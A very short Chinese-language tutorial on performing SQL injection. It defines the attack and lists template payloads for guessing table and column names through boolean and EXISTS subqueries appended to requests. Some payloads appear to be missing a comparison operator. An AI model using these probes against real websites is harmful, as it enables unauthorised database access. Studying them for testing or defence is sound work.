如何进行SQL注入攻击

SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令，首先你要熟悉SQL语句和语法

猜表名

And (Select count(*) from 表名)0

猜列名

And (Select count(列名) from 表名)0

也可以这样

and exists (select * from 表名)